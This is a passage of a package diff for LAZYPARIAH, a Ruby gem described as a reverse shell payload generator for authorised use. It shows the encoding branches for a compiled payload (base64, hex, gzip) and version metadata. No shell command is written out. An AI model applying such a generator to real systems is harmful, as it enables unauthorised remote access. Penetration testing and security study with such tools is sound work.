print_output(binary_payload_b64, url_encode
|
|
366
|
-
|
|
447
|
+
print_output(s: binary_payload_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
448
|
+
elsif hex_payload
|
|
449
|
+
# Hex-encoded rust_binary payload.
|
|
367
450
|
binary_payload_hex = binary_payload.unpack("H*")[0]
|
|
368
|
-
print_output(binary_payload_hex, new_line
|
|
369
|
-
|
|
451
|
+
print_output(s: binary_payload_hex, new_line: !arguments[:"no-new-line"])
|
|
452
|
+
elsif gzip_payload
|
|
453
|
+
# Zlib-compressed rust_binary payload.
|
|
370
454
|
sio = StringIO.new()
|
|
371
455
|
sio.binmode()
|
|
372
456
|
gz = Zlib::GzipWriter.new(sio)
|
|
373
457
|
gz.write(binary_payload)
|
|
374
458
|
gz.close()
|
|
375
459
|
binary_payload_gzip = sio.string
|
|
376
|
-
print_output(binary_payload_gzip, new_line
|
|
377
|
-
|
|
460
|
+
print_output(s: binary_payload_gzip, new_line: false)
|
|
461
|
+
elsif gzip_b64_payload
|
|
462
|
+
# Zlib-compressed and base-64-encoded rust_binary payload.
|
|
378
463
|
sio = StringIO.new()
|
|
379
464
|
sio.binmode()
|
|
380
465
|
gz = Zlib::GzipWriter.new(sio)
|
|
@@ -382,16 +467,20 @@ begin
|
|
|
382
467
|
gz.close()
|
|
383
468
|
binary_payload_gzip = sio.string
|
|
384
469
|
binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
|
|
385
|
-
print_output(binary_payload_gzip_b64, url_encode
|
|
386
|
-
|
|
470
|
+
print_output(s: binary_payload_gzip_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
|
|
471
|
+
elsif gzip_hex_payload
|
|
472
|
+
# Zlib-compressed and hex-encoded rust_binary payload.
|
|
387
473
|
sio = StringIO.new()
|
|
388
474
|
sio.binmode()
|
|
389
475
|
gz = Zlib::GzipWriter.new(sio)
|
|
390
|
-
gz.write(binary_payload
|
|
476
|
+
gz.write(binary_payload)
|
|
391
477
|
gz.close()
|
|
392
478
|
binary_payload_gzip = sio.string
|
|
393
479
|
binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
|
|
394
|
-
print_output(binary_payload_gzip_hex)
|
|
480
|
+
print_output(s: binary_payload_gzip_hex, new_line: !arguments[:"no-new-line"])
|
|
481
|
+
else
|
|
482
|
+
# Standard rust_binary payload.
|
|
483
|
+
print_output(s: binary_payload, new_line: false)
|
|
395
484
|
end
|
|
396
485
|
end
|
|
397
486
|
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: lazypariah
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 1.
|
|
4
|
+
version: 1.3.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Peter Funnell
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2021-03-
|
|
11
|
+
date: 2021-03-23 00:00:00.000000000 Z
|
|
12
12
|
dependencies: []
|
|
13
13
|
description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
|
|
14
14
|
on the fly. It is intended to be used only in authorised circumstances by qualified
|